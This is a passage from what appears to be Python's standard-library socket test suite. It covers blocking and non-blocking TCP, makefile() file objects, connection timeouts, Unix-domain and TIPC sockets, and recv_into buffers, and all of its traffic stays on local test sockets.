self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
# handle EWOULDBLOCK/EGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must inherit
# the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = support.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except socket.timeout:
pass
except OSError as exc:
if support.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('socket.timeout not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
